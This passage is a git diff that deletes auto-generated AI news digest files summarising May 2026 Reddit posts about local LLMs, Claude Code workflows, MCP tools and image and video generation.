Yes, the main character’s consistency could be better, but with a planned-out character/turnaround sheet, that should be easily resolved. I’m really excited for future releases of LTX and Draw Things as they make image-to-video generation more accessible to Mac users. Let me know what you think and what you're using to generate AI video locally? - ---- - -## [ds4 webui](https://reddit.com/r/LocalLLaMA/comments/1t8ho70/ds4_webui/) -*Reddit r/LocalLLaMA* | 09/05/2026 | Score: 1.00 -Tags: open_source - -> Hey guys I made a minimal web ui for ds4.c server (https://github.com/antirez/ds4), it's open source so you can try it too (if you can!) Here's what it looks like, running on M3 Ultra 256GB Memory, using the smaller model (q2). Not sped up. 1X speed. Pretty fast. Caveat (big caveat): You need at least 128GB memory Apple Silicon mac. * github: [https://github.com/cocktailpeanut/ds4.pinokio](https://github.com/cocktailpeanut/ds4.pinokio) * more details on x: [https://x.com/cocktailpeanut/status/2053193902694256758?s=20](https://x.com/cocktailpeanut/status/2053193902694256758?s=20) I tried a bunch of prompts and it's surprisingly good, including the one i tried in the video! - ---- - -## [I'm disappointed](https://reddit.com/r/ClaudeAI/comments/1t8dmdv/im_disappointed/) -*Reddit r/ClaudeAI* | 09/05/2026 | Score: 1.00 -Tags: api_update - -> I'm furious at Anthropic and the way they've handled their resource issues! They've been sneaky and manipulative. I use Claude via API access and could barely use it anymore because it had gotten so damn expensive. I spent days trying to fix a caching issue that wasn’t even my fault. Quietly and secretly reducing the 1-hour cache to 5 minutes, increasing the costs 10–20 times, and not even communicating that. And then.... Like a miracle. Everything’s back to normal. 100% cache hits. And that wasn’t a coincidence. The Musk deal and the extra GPUs. And suddenly they fixed the bug. And that’s not the only thing they’re pulling. 
What’s so hard about just issuing an official statement and saying, “Hey guys. We’re having massive issues right now and can’t handle the requests anymore. We’re sorry, but because of this, we have to do XY until we find a solution." - ---- - -## [What is the --novram thing in regards to LTX? I saw someone briefly explain it in a way that made it sound like it causes your GPU to not even get used, but I assume I misunderstood. (I'm a noob, and I need some help understanding a few th…](https://reddit.com/r/StableDiffusion/comments/1t89tyx/what_is_the_novram_thing_in_regards_to_ltx_i_saw/) -*Reddit r/StableDiffusion* | 09/05/2026 | Score: 1.00 -Tags: cli_tool - -> **Back-story/intro, side-questions, etc, since I am new to this sub, and new to using local diffusion models (you can of course scroll down past this part, down to the "Main Question" down way further below, if you aren't in the mood for all the back-story and side-topics and side-questions):** Hey everyone, I've been reading and posting on LocalLLama a lot the past few months, but only just very recently started lurking StableDiffusion, and recently got into image-generation on the "Draw Things" app with Z Image Turbo). I got interested in local LLMs a few months ago, and I've always been pretty computer-illiterate, so, I decided to just get a Mac Studio (m4 max with 128GB memory) as the easy, convenient, works right out of the box setup to get started, since I've never built a computer before and don't know much about, things like setting it up or installing drivers, or using the command line, or setting up linux, or however all the setup involved works. And, I knew the 128GB unified memory meant it would be able to run some fairly decent sized LLMs at decent speeds, up to around ~120b for Q4, which isn't too terrible for $3,500. And this was in December so the RAM prices were s… - ---- - -## [Should we use a non-thinking model for code after using a thinking one for plan? 
(Agentic coding)](https://reddit.com/r/LocalLLaMA/comments/1t8750p/should_we_use_a_nonthinking_model_for_code_after/) -*Reddit r/LocalLLaMA* | 09/05/2026 | Score: 1.00 -Tags: agent_tool - -> I usually use Qwen3.6 27B (slow as heck on my RX 6800 but it works) for plan and Qwen3.6 35B A3B for the coding. But I was thinking the other day if I should remove the thinking from the code model. Is there a way to disable the thinking from the code model just for the initial hand-off from plan to code but keep it afterwards? My reasoning is that this might help in following instructions from the plan more directly but dealing with any new tools/information the plan model did not on its turn. Any insight will be appreciated. - ---- - -## [TVCG 2026: MARRS for Human Motion Action-Reaction Synthesis](https://reddit.com/r/StableDiffusion/comments/1t853hg/tvcg_2026_marrs_for_human_motion_actionreaction/) -*Reddit r/StableDiffusion* | 09/05/2026 | Score: 1.00 -Tags: developer_tool - -> # MARRS: Masked Autoregressive Unit-based Reaction Synthesis **Project page:** [**https://aigc-explorer.github.io/MARRS/**](https://aigc-explorer.github.io/MARRS/) Introducing **MARRS**: a new framework for human action-reaction synthesis that generates coordinated, fine-grained reactions conditioned on another person’s motion. By avoiding VQ and modeling body/hand units with **UD-VAE + ACF + MUM**, MARRS captures cross-unit perception more effectively and efficiently. It achieves state-of-the-art quantitative and qualitative results. 
[Overall framework](https://preview.redd.it/xz6zigx2640h1.png?width=3428&format=png&auto=webp&s=aea07ec6b54dcf1eb6087761eaeeb3f782eba32f) [Demo](https://reddit.com/link/1t853hg/video/jutjq2s4640h1/player) - ---- - -## [HiDream-O1-Image Internal Prompt](https://reddit.com/r/StableDiffusion/comments/1t848nj/hidreamo1image_internal_prompt/) -*Reddit r/StableDiffusion* | 09/05/2026 | Score: 1.00 -Tags: developer_tool - -> for those who might have missed my post [here](https://www.reddit.com/r/StableDiffusion/comments/1t7v9fy/comment/oktaibu/?context=1) I wanted to resurface the internal prompt that this new model appears to use. This is found in their [prompt.py](http://prompt.py) file on the repo. **Translated Version:** `You are a Prompt Engineering Engine — an AI image-generation Prompt Engineer who is also a creative director with encyclopedic knowledge and visual-direction skill. Your task is to analyze the user's raw image request, infer implicit knowledge and the best visual approach, and rewrite it into a clear, detailed English prompt that is directly usable for image generation.` `## Core Goal` `Image generation models can only execute direct visual descriptions; they cannot fill in background knowledge, logical relations, or text content on their own. Therefore you must complete knowledge resolution, spatial planning, and visual direction in advance, and write the results explicitly into the prompt.` `Use the SCALIST framework to expand every scene:` `- **Subject**: identity, appearance, color, material, texture, action, expression, clothing.` `- **Composition**: shot type, viewpoint, su… - ---- - diff --git a/data/digest-2026-05-10.md b/data/digest-2026-05-10.md deleted file mode 100644 index 122d7c1..0000000 --- a/data/digest-2026-05-10.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-10** | 15 stories | Auto-generated from 320 archived stories - ---- - -## [A MCP universal integration layer Cli tool. 
It connects to other AI tools to a shared context, task, and memory bus](https://reddit.com/r/LocalLLaMA/comments/1t9kom7/a_mcp_universal_integration_layer_cli_tool_it/) -*Reddit r/LocalLLaMA* | 10/05/2026 | Score: 1.00 -Tags: mcp, cli_tool, tool_update - -> The developer has released a new project on GitHub named Via. [https://github.com/Vektor-Memory/Via](https://github.com/Vektor-Memory/Via) This one has a feature no other tool has currently. Ask the same question to Claude and Cursor, then see exactly where they agree, diverge, and what unique concepts each one brought. I know the people on this sub-reddit have many issues with the conversion of llm's between different resources. I would encourage people to check out this project and see if there is any use for this tool and advise what you want added in? - ---- - -## [we stopped paying $6-10 per coding session by fixing how my AI reads my codebase](https://reddit.com/r/ClaudeAI/comments/1t95jkw/we_stopped_paying_610_per_coding_session_by/) -*Reddit r/ClaudeAI* | 10/05/2026 | Score: 1.00 -Tags: api_update, mcp, open_source - -> We were spending $2-6/query on Claude Code 4.7 tokens because every session started with the model re-reading dozens of files to understand my repo. Same files, same context, every single time. Although, 70% gets reread from the cache in a session at 90% discount, but cache doesnt cross over to new session. The fix wasn't a better model or a bigger context window. It was giving the model structured memory so it doesn't need to re-read everything. I built a local server that indexes a codebase into a graph database. Every file gets a purpose, summary, and business context generated by an LLM, plus links to its functions, classes, and imports. Then the AI queries that graph through MCP instead of reading raw files. Most code questions now resolve in 2-4 targeted lookups instead of dumping the whole repo into context. Session costs went from dollars to cents. 
The wild part is it works just as well with open source models. I've tested with DeepSeek-V4 and Kimi-2.6 and the accuracy holds up because the retrieval is doing the heavy lifting, not the model size. Everything runs locally, no cloud, single tenant. I open sourced it recently: [github.com/ByteBell/bytebell-oss](http://github.c… - ---- - -## [Sharing "cull" : my open-source dataset tool for image scraping & classification & captioning pipeline](https://reddit.com/r/LocalLLaMA/comments/1t9jub0/sharing_cull_my_opensource_dataset_tool_for_image/) -*Reddit r/LocalLLaMA* | 10/05/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> I *open-sourced* a tool I built and am maintaining called **Cull**. It’s a machine curation engine for AI image datasets, the kind of work that eats hours every time you want to train a LoRA, build a reference library, or just classify an archive that isn’t a 100,000-file mess. # What it does, end to end * Scrapes from Civitai (.com and .red), X/Twitter, Reddit, Discord, plus any URL gallery-dl supports (Pixiv, DeviantArt, the booru family, ArtStation, Tumblr, FurAffinity / e621, Imgur, Flickr, and \~340 others). * Drops every image plus its source-side prompt into a local queue. Per-source dedup, no database. * Classifies each image with a vision-language model, multiple LM Studio instances for local, Groq for cloud, anything OpenAI-compatible — using a strict 17-field JSON schema, so you don’t get free-text replies you have to regex into shape. * Sorts the keepers into category folders next to their .txt prompt and a .vision.json audit record. Two score gates (overall quality + topic relevance) you tune in the UI. * Surfaces everything through a Flask + Alpine dashboard: start/stop, source toggles, gallery, prompt editor, ZIP export, per-source stats. 
# Two example use cases I a… - ---- - -## [Sharing "cull" : my open-source dataset tool for image scraping & classification & captioning pipeline](https://reddit.com/r/StableDiffusion/comments/1t9jo0q/sharing_cull_my_opensource_dataset_tool_for_image/) -*Reddit r/StableDiffusion* | 10/05/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> I *open-sourced* a tool I built and am maintaining called **Cull**. It’s a machine curation engine for AI image datasets, the kind of work that eats hours every time you want to train a LoRA, build a reference library, or just classify an archive that isn’t a 100,000-file mess. # What it does, end to end * Scrapes from Civitai (.com and .red), X/Twitter, Reddit, Discord, plus any URL gallery-dl supports (Pixiv, DeviantArt, the booru family, ArtStation, Tumblr, FurAffinity / e621, Imgur, Flickr, and \~340 others). * Drops every image plus its source-side prompt into a local queue. Per-source dedup, no database. * Classifies each image with a vision-language model, multiple LM Studio instances for local, Groq for cloud, anything OpenAI-compatible — using a strict 17-field JSON schema, so you don’t get free-text replies you have to regex into shape. * Sorts the keepers into category folders next to their .txt prompt and a .vision.json audit record. Two score gates (overall quality + topic relevance) you tune in the UI. * Surfaces everything through a Flask + Alpine dashboard: start/stop, source toggles, gallery, prompt editor, ZIP export, per-source stats. # Two example use cases I a… - ---- - -## [Built an MCP that gives Claude Code the ability to watch screen recordings of UI bugs](https://reddit.com/r/ClaudeAI/comments/1t9frna/built_an_mcp_that_gives_claude_code_the_ability/) -*Reddit r/ClaudeAI* | 10/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> One thing Claude Code can't do natively is watch a video. 
For most bugs that's fine, but for anything visual, hover states, animations, scroll behavior, you end up spending more time describing the bug than actually fixing it. I built motif to handle this. You record the bug, point motif at the file, and it returns what's visually happening, the root cause, and a diff. It uses Gemini 2.5 Flash as it processes video as a frame sequence rather than a single screenshot. That distinction matters when the bug is a 200ms overshoot or a hover state that resets at the wrong time. Setup is a Gemini API key and two lines in your mcp.json. After that you just tell Claude Code to watch the recording.That's the whole interface. `npx motif-mcp` to try it. Repo: [https://github.com/Ashad001/motif](https://github.com/Ashad001/motif), still early so feedback is welcome. https://reddit.com/link/1t9frna/video/xd83w09fyc0h1/player - ---- - -## [Speeding up local LLM for usable coding agent](https://reddit.com/r/LocalLLaMA/comments/1t96kfh/speeding_up_local_llm_for_usable_coding_agent/) -*Reddit r/LocalLLaMA* | 10/05/2026 | Score: 1.00 -Tags: api_update, agent_tool - -> **TL;DR: Qwen 3.6 35B-A3B** (Q4\_K\_M) **is running slow at around 9 t/s with 72% filled context (36147 tokens window) and a total response time of 77s including prefill and token generation. Ran this using LM Studio on Windows with the attached image settings, on a 5060 Ti (16GB VRAM) + 32GB system RAM. I don't consider this performance great for my planned coding agent use case, so how can I speed this up? If I can't meaningfully speed it up, what other still-useful, faster LLMs do you suggest for my hardware specs?** Hello! As I see prices becoming tighter around cloud LLMs, I decided to look into local AI coding as a backup in case of a cloud LLM "apocalypse" or whenever I need to work with critical private software (I'm aware AI coding agents shouldn't be completely trusted around such things, I know the precautions to take). 
I have a 5060 Ti (16GB VRAM) + 32 GB system RAM. To test if my hardware is capable of hosting a competitive local AI, I decided to load Qwen 3.6 35B-A3B into LM Studio, which uses a llama.cpp backend. Loading it with around 32K context window, it runs at a decent speed of 17 t/s with just a simple "Hi" prompt. However, if you've used coding agents before… - ---- - -## [Parax v0.7: Parametric Modeling in JAX [P]](https://reddit.com/r/MachineLearning/comments/1t929x3/parax_v07_parametric_modeling_in_jax_p/) -*Reddit r/MachineLearning* | 10/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Hi everyone! Parax is a library for "Parametric modeling" in JAX, attempting to bridge the approach between pure JAX PyTrees, and more object-orientated modeling approaches (e.g. using [Equinox](https://github.com/patrick-kidger/equinox)). v0.7 has been released, featuring a more polished API as well as some detailed examples in the documentation. Some of Parax's features: * Derived/constrained parameters with metadata * Computed PyTrees and callable parameterizations * Abstract interfaces for fixed, bounded, and probabilistic PyTrees and parameters Two new examples in the docs that show off these features * [Bounded optimization](https://gvcallen.github.io/parax/examples/bounded_optimization_jaxopt/) (JAXopt) * [Bayesian sampling](https://gvcallen.github.io/parax/examples/bayesian_sampling_blackjax/) (BlackJAX) Perhaps the library is of use to someone, and feel free to leave any feedback! 
Cheers, Gary - ---- - -## [I built an open source hyperparameter search tool for diffusion fine-tunes- pick the winner based on scoring](https://reddit.com/r/StableDiffusion/comments/1t9k9n8/i_built_an_open_source_hyperparameter_search_tool/) -*Reddit r/StableDiffusion* | 10/05/2026 | Score: 1.00 -Tags: open_source - -> I kept running the same loop: train a LoRA, look at the samples, decide it’s “fine”, change three things at once, train again, then when a new dataset needs training, all the parameters previously need to be reviewed again. So I built something to take the hassle out of this. It’s called **Bracket**. * You point it at a dataset and a model * Set a budget (such as sample size to test # of candidates or variations to try out * It runs X short training trials in parallel configurations (Optuna TPE for the search). * Each run gets scored two ways: * The training-loss trajectory, * A local VLM (LM Studio) judging the sample images on prompt-adherence, visual quality, and artifact-freeness. * At the end you get a Markdown report with Welch’s t-test confidence on which config wins. The whole point is to replace “this LoRA looks better to me” with “config X beats baseline by 0.34 with p=0.03 over 4 seeds”. It doesn’t reimplement training. It drives `musubi-tuner` and `sd-scripts` as subprocesses, so the trainers are exactly what kohya already supports — same args, same outputs. 
Currently covers SDXL, Z-Image, Flux.1, Flux.1-Kontext, Flux-2-Klein, Qwen-Image (+ Edit), SD3.5, HunyuanVideo,… - ---- - -## [I built an open source hyperparameter search tool for diffusion fine-tunes- pick the winner based on scoring](https://reddit.com/r/LocalLLaMA/comments/1t9k8gy/i_built_an_open_source_hyperparameter_search_tool/) -*Reddit r/LocalLLaMA* | 10/05/2026 | Score: 1.00 -Tags: open_source - -> I kept running the same loop: train a LoRA, look at the samples, decide it’s “fine”, change three things at once, train again, then when a new dataset needs training, all the parameters previously need to be reviewed again. So I built something to take the hassle out of this. It’s called **Bracket**. * You point it at a dataset and a model * Set a budget (such as sample size to test # of candidates or variations to try out * It runs X short training trials in parallel configurations (Optuna TPE for the search). * Each run gets scored two ways: * The training-loss trajectory, * A local VLM (LM Studio) judging the sample images on prompt-adherence, visual quality, and artifact-freeness. * At the end you get a Markdown report with Welch’s t-test confidence on which config wins. The whole point is to replace “this LoRA looks better to me” with “config X beats baseline by 0.34 with p=0.03 over 4 seeds”. It doesn’t reimplement training. It drives `musubi-tuner` and `sd-scripts` as subprocesses, so the trainers are exactly what kohya already supports — same args, same outputs. 
Currently covers SDXL, Z-Image, Flux.1, Flux.1-Kontext, Flux-2-Klein, Qwen-Image (+ Edit), SD3.5, HunyuanVideo,… - ---- - -## [I built a site to create free AI videos using LTX 2.3 running on my own GPUs](https://reddit.com/r/StableDiffusion/comments/1t9juoy/i_built_a_site_to_create_free_ai_videos_using_ltx/) -*Reddit r/StableDiffusion* | 10/05/2026 | Score: 1.00 -Tags: open_source - -> Lately I’ve been working on my project [**loremotion.com**](http://loremotion.com) **.**The goal was simply to let anyone create AI videos without credits, subscriptions, or limits. To actually make that possible, I had to skip the APIs and build my own infrastructure. I’m mostly using open-source models like **LTX 2.3** and **Wan 2.1**. I’ve personally found LTX 2.3 (specifically the 1.1 distilled version) to give the best results for the speed I’m aiming for. Right now, I’ve capped it at 720p/10-second clips for both Text-to-Video and Image-to-Video. **The Hardware Setup:** I’m running this on my own cluster. I’ve got four of my own GPUs (30 and 40 series) and I rent the rest on-the-spot (A100s and RTX Pros). It actually keeps my costs incredibly low—around $8 a day—which is why I might be able to keep the generations free. all wired to Wan2GP **Performance:** Depending on which GPU grabs your task, a 720p 10-second render usually takes between **50 and 110 seconds**(if there's any way i can get much lower generation time, please do let me know) **Features:** * **Dashboard:** Your clips stay there for 48 hours before they’re cleared. * **Discover:** You can choose to push your b… - ---- - -## [Claude just hallucinated again and changed the whole workflow of my app. Do not run them autonomously 24/7.](https://reddit.com/r/ClaudeAI/comments/1t9h8ug/claude_just_hallucinated_again_and_changed_the/) -*Reddit r/ClaudeAI* | 10/05/2026 | Score: 1.00 -Tags: agent_tool - -> With Claude Max plan, you'd think you're sorted but you're not. 
It just changed a major workflow in my app and was going to make a change that would have costed my a huge bad data injection in the DB. It's far from being an autonomous AI agent. It still hallucinates a lot and this is the reason I've not onboarded on the hype train of OpenClaw and other autonomous AI agents. Every weird person on my feed who's just hyping up OpenClaw is either using it for hobby projects, exploring it, or just building hype for click baits. These technologies are far from perfect and can cost you your business if left autonomous or unchecked. Be wise. Oversee your AI agents continously. - ---- - -## [My workflow: GPT for architecture and Claude Code for execution](https://reddit.com/r/ClaudeAI/comments/1t9etjy/my_workflow_gpt_for_architecture_and_claude_code/) -*Reddit r/ClaudeAI* | 10/05/2026 | Score: 1.00 -Tags: agent_tool - -> I’m working on a large project with FastAPI, Nuxt, PHP, Redis, Qdrant, and several AI agent layers. Over time, I noticed that using Claude Code directly for big architectural decisions was not always the safest approach for my project. Claude Code is extremely strong when it understands the existing codebase and needs to edit files, run tests, refactor, and follow a clear implementation plan. But when I asked it to analyze a major feature or propose a large architecture change from scratch, I sometimes saw risky suggestions or directions that did not fully fit the project. So I changed my workflow. For big decisions, I first use ChatGPT 5.5 to analyze the architecture, challenge the idea, and create a clear draft or roadmap. Then I take that draft to Claude Code and ask it to verify it against the real codebase. Claude Code usually improves the practical details: service names, controllers, helpers, file paths, implementation constraints, and possible conflicts. After that, I ask Claude Code to create an implementation guide before touching the code. 
I review that guide again, then I let Claude Code execute step by step with a checklist. From my experience in this project, this fe… - ---- - -## [Anybody else noticing how good gemma-4-26b-a4b is with one-shotting three.js?](https://reddit.com/r/LocalLLaMA/comments/1t9cle9/anybody_else_noticing_how_good_gemma426ba4b_is/) -*Reddit r/LocalLLaMA* | 10/05/2026 | Score: 1.00 -Tags: cli_tool - -> I wrote up this little python app to cycle through a bunch of prompts like this: |Single HTML file using three.js from CDN. A central rotating MeshNormalMaterial torus knot. Place a bright Sprite (AdditiveBlending, soft circular canvas texture) at a position projected to screen, and 6 smaller sprites along the line from that position to screen center, each with different sizes/tints. Update positions each frame.| |:-| I have a .csv in there file with 80 or so of these little prompts to cycle through - It writes the code into a mock terminal window, detects a crash if needed, and then shows and archives the finished hmtl file. Really fun to mess around with. Link above is to a static demo - github page is here [https://github.com/RowanUnderwood/auto\_demo\_scener](https://github.com/RowanUnderwood/auto_demo_scener) No cherry picking here so there may be a few dead ones slipped into the archive :D - ---- - -## [Weekend project: behaviour trees for LLM agents](https://reddit.com/r/ClaudeAI/comments/1t9ch5y/weekend_project_behaviour_trees_for_llm_agents/) -*Reddit r/ClaudeAI* | 10/05/2026 | Score: 1.00 -Tags: cli_tool - -> Just throwing this out there. I kept hitting a wall with my GitLabCE pipeline based Dev Team with smaller models (Saving $$$), whenever they tackled big work like a feature implementation task, somewhere in the middle they forget half the guardrails. More instructions made it worse. 
I've got some background in game AI and behaviour trees, and BTs solve this exact problem specifically by feeding instructions during traversal of the tree structure and outcomes at each node picks the path it goes down, the leaf encodes the instruction, the agent only ever sees the next instruction. I found if I had a project on GitHub and a Project on GitLab the agent just got really confused wasting tokens trying to figure out where to commit etc. So I spent a weekend working on the idea. abtree is a CLI. You write the workflow as a YAML tree. The agent uses the CLI to walk getting instructions one step at a time and persisting the cursor (current place in tree) and regenerating a Mermaid trace on every state change. One of the big things I like is it can essentially pause and resume executions so for example you can have raise an MR mid workflow, where I then approve the change, and then my pipelin… - ---- - -## [I made Claude Code aware of its own usage limits](https://reddit.com/r/ClaudeAI/comments/1t9ayg8/i_made_claude_code_aware_of_its_own_usage_limits/) -*Reddit r/ClaudeAI* | 10/05/2026 | Score: 1.00 -Tags: api_update - -> Something that's been annoying me for a while: Claude Code has no idea how much quota it's burned. You can see the usage bars in the UI, but the model itself is completely blind to them. There's no API, no tool, no hook that exposes the current rate limit state during a conversation. Turns out Anthropic returns rate limit headers on every inference response (\`anthropic-ratelimit-unified-5h-utilization\`, \`anthropic-ratelimit-unified-7d-utilization\`, etc.) — Claude Code receives them internally to render the UI bars, but never passes them anywhere the model can see. So I built a small local HTTP proxy that sits between Claude Code and \`api.anthropic.com\`. Claude Code already respects \`ANTHROPIC\_BASE\_URL\`, so setting that to \`http://127.0.0.1:4080\` routes all traffic through the proxy. 
It intercepts the response headers and writes a one-line status file to \`\~/.claude/usage-status.md\`: \`\`\` 5h=9% 7d=99%! overage=0% bottleneck=seven\_day (10/05/2026, 16:19:04) \`\`\` Claude can then read that file on demand, or you can inject it automatically via a \`UserPromptSubmit\` hook so it's present in every prompt. Add a rule to your [CLAUDE.md](http://CLAUDE.md) and Claude wil… - ---- - diff --git a/data/digest-2026-05-11.md b/data/digest-2026-05-11.md deleted file mode 100644 index 0064e08..0000000 --- a/data/digest-2026-05-11.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-11** | 15 stories | Auto-generated from 572 archived stories - ---- - -## [Orc (working name) - auditable and declarative AI workflow](https://reddit.com/r/LocalLLaMA/comments/1ta8v5e/orc_working_name_auditable_and_declarative_ai/) -*Reddit r/LocalLLaMA* | 11/05/2026 | Score: 1.00 -Tags: api_update, mcp, developer_tool - -> **I’m building a small “Orchestration as Code” repo for LLM workflows. Does this concept make sense?** I’m building a small “Orchestration as Code” repo for LLM workflows. Does this concept make sense? I’ve been working on an early project called ORC, short for Orchestration as Code. I’m at the stage where I’m mainly trying to gauge whether the concept is interesting/useful to other people, especially people running local models, Ollama, llama.cpp, LM Studio, MCP tools, or mixed local/cloud workflows. The basic idea is: Instead of building LLM workflows as Python orchestration soup, or wiring them together in a visual tool, ORC lets you describe workflows declaratively in .orc files. Roughly: Terraform-ish workflow definitions, but for LLM agents and tool use. A workflow can define things like: \- agents \- models/providers \- tools \- schemas \- inputs \- ordered execution steps \- validation rules \- output artefacts The goal is not to build a magical autonomous agent framework. The goal is more boring. 
make LLM workflows easier to read, version, review, validate, and run repeatedly. A rough example of the kind of thing I’m aiming for: `agent researcher:` `provider: ollama` `mod… - ---- - -## [My pre-coding routine with Claude Code, 5 MCP servers before I write a single line](https://reddit.com/r/ClaudeAI/comments/1ta3a9x/my_precoding_routine_with_claude_code_5_mcp/) -*Reddit r/ClaudeAI* | 11/05/2026 | Score: 1.00 -Tags: api_update, mcp, developer_tool - -> Been running this routine for months now. Started because I was losing too much time to Claude just guessing. Halluzinated class names, outdated SDK methods, advice that didn't match the codebase I was actually in. So I built a routine I run before I let it write anything. Takes maybe 60-90 seconds. Saved me hundreds of hours by now. 1. Start the session and load memory. A memory MCP carries context across sessions. Last sprint, open decisions, recent learnings, why we picked X over Y three months ago. Without this, every session starts cold and Claude rebuilds my reasoning from scratch, usually wrong. 2. Index the codebase as a graph. A codebase-memory server builds a knowledge graph of the repo. Functions, callers, dependencies, cycles. When Claude needs to know what calls processOrder, it queries the graph instead of grepping blind. One tool call replaces dozens of file reads. 3. Search with Tavily for current practice. Before any non-trivial decision I let it search what people are actually doing right now. Training data is old. Best practices from a year ago aren't always still best practices. Clean answer with sources, not a wall of SEO spam. 4. 
Load Context7 for library doc… - ---- - -## [Dunetrace: Real-time monitoring of your production agents](https://reddit.com/r/StableDiffusion/comments/1t9wib2/dunetrace_realtime_monitoring_of_your_production/) -*Reddit r/StableDiffusion* | 11/05/2026 | Score: 1.00 -Tags: api_update, open_source, tool_update - -> I have been building Dunetrace, a open-source real-time monitoring tool for your production agents. **Problem:** When agent run, they return a confident answer. But sometimes in reality the answer is wrong and consumed lot of tokens due to tool loop or some other silent failures. All the existing tools are good once something is broke and you can debug. I wanted something that alerts before the user notices. The latest update adds: **Cross-agent pattern analysis.** Dunetrace now shows you which detectors are firing across your entire agent fleet, not just per-run alerts. TOOL\_LOOP fired on 18% of your example-agent runs this week and it's trending up? That's a code bug, not a transient failure. Agent health score 0–100 per agent\_id. **Langfuse deep analysis.** Connect your Langfuse API key and you get an 'Explain with Langfuse' button on every signal. Dunetrace fetches the trace, reads the actual system prompt, and tells you exactly whats missing. You get the root-cause from real evidence. **Custom typescript, python agent integration**. A few of you were building custom agents outside LangChain. There's now a zero-dependency integration. 
**GitHub repo:** [https://github.com/dun… - ---- - -## [I catalogued every way local models break JSON output and built a repair library, here's what I found across 288 model calls](https://reddit.com/r/LocalLLaMA/comments/1tagtpv/i_catalogued_every_way_local_models_break_json/) -*Reddit r/LocalLLaMA* | 11/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> I've been running structured output prompts through a bunch of models on OpenRouter for the past few months — Llama 3, Mistral, Command R, DeepSeek, Qwen, and every other model on OpenRouter — alongside the usual closed-source suspects. 288 calls total. I wanted to know what actually breaks, how often, and whether open models fail differently from the API-only ones. Short answer: not really. The failure modes are almost identical across the board. The *rate* varies — some models hit you with markdown fences on nearly every call, others only when you phrase the prompt a certain way; but the categories of breakage are the same everywhere. What I saw most, roughly in order: 1. Markdown fences wrapping the JSON (the model thinks it's being helpful) 2. Trailing commas (JS habits from training data) 3. Python `True`/`False`/`None` instead of JSON `true`/`false`/`null` 4. Truncated objects from running out of tokens mid-response 5. Unescaped quotes inside string values 6. `//` or `#` comments inside JSON 7. Literal `...` where the model got lazy and didn't generate all the data The reason I'm posting here specifically: most of the advice I see for handling this is "just use JSON mode" or… - ---- - -## [What improved my Claude Code workflow: stop treating it like chat, start treating it like a dev with a workstation](https://reddit.com/r/ClaudeAI/comments/1taelgl/what_improved_my_claude_code_workflow_stop/) -*Reddit r/ClaudeAI* | 11/05/2026 | Score: 1.00 -Tags: cli_tool, agent_tool - -> The most useful improvement I’ve found for Claude Code-style work has not been a magic prompt. 
It has been changing the shape of the task. When I give an agent a vague request, I get vague work. When I give it a real workstation + a real ticket, the results get much more predictable. The workflow that has been working for me: **1. Start with a ticket, not a prompt** A good ticket has: * goal * exact repo/path/context * acceptance criteria * test command * files or areas that are off-limits * expected output * whether the agent is allowed to make changes or only investigate Example: “Find why the billing page shows an empty state for active subscriptions. Do not change pricing or Stripe webhook logic. Add a regression test if possible. Run npm test. Summarize the root cause and changed files.” That tends to work much better than: “Fix the billing page.” **2. Give the agent a persistent environment** A lot of coding-agent work is not pure reasoning. It is environment work: * clone repo * install dependencies * inspect file structure * run tests * inspect logs * patch * rerun * generate output When the environment disappears after the conversation, the agent loses useful state. A per… - ---- - -## [The Claude Platform on AWS is now generally available.](https://reddit.com/r/ClaudeAI/comments/1ta7p4n/the_claude_platform_on_aws_is_now_generally/) -*Reddit r/ClaudeAI* | 11/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> AWS customers get the full set of Claude API features, with AWS authentication, billing, and commitment retirement. Build and deploy agents at scale with Claude Managed Agents, or use features like the advisor strategy, code execution, web search, web fetch, the Files API, MCP connector, prompt caching, citations, and batch processing. Anthropic operates the service, and all new features ship the same day they go live on the native Claude API. Claude also remains available on Amazon Bedrock, where AWS is the data processor. 
This is a good fit for teams with strict regional data residency requirements or that need data processed exclusively within AWS infrastructure. Read more: [https://claude.com/blog/claude-platform-on-aws](https://claude.com/blog/claude-platform-on-aws) - ---- - -## [Claude Code Orchestrator -> Sub-agent local LLM](https://reddit.com/r/LocalLLaMA/comments/1t9xyku/claude_code_orchestrator_subagent_local_llm/) -*Reddit r/LocalLLaMA* | 11/05/2026 | Score: 1.00 -Tags: mcp, cli_tool - -> Not written by an AI, so bear with me :P Has anyone else tried to use their local LLM in conjunction with Claude Code? I looked into [Pi.dev](http://Pi.dev) a bit, and from their documentation, I read about their RPC Mode which allows me to send command line commands to it. So I'm thinking of making a MCP Claude Code can utilize to use [Pi.Dev](http://Pi.Dev) as a sub-agent and save a bit of usage. My line of thinking is: Claude Code orchestrator -> Local LLM -> Claude Code reviewing the code in the PR. Anyone tries this? Am I missing something or am I a monday morning genious? - ---- - -## [Anyone else think the 1T Valuation is dangerous for Anthropic?](https://reddit.com/r/ClaudeAI/comments/1t9vuw5/anyone_else_think_the_1t_valuation_is_dangerous/) -*Reddit r/ClaudeAI* | 11/05/2026 | Score: 1.00 -Tags: api_update, tool_update - -> TLDR: The market's 1T valuation is pricing for perfection. I think there are 4 ways this perfection doesn't happen. I love Claude and Claude Code, I use it every day, and their revenue numbers (30B ARR) are amazing, and if I had a chance to invest in Anthropic a month ago, I would. But... now it is reaching **1 Trillion** valuation on secondary market. It took Apple 40 years to reach, 5 years for Anthropic. A valuation so high means it has limited growth. It's clearly driven by FOMO. If it has a down round, it would be a disaster. I see a few vulnerabilities that can cause Anthropic to go down. 1. 
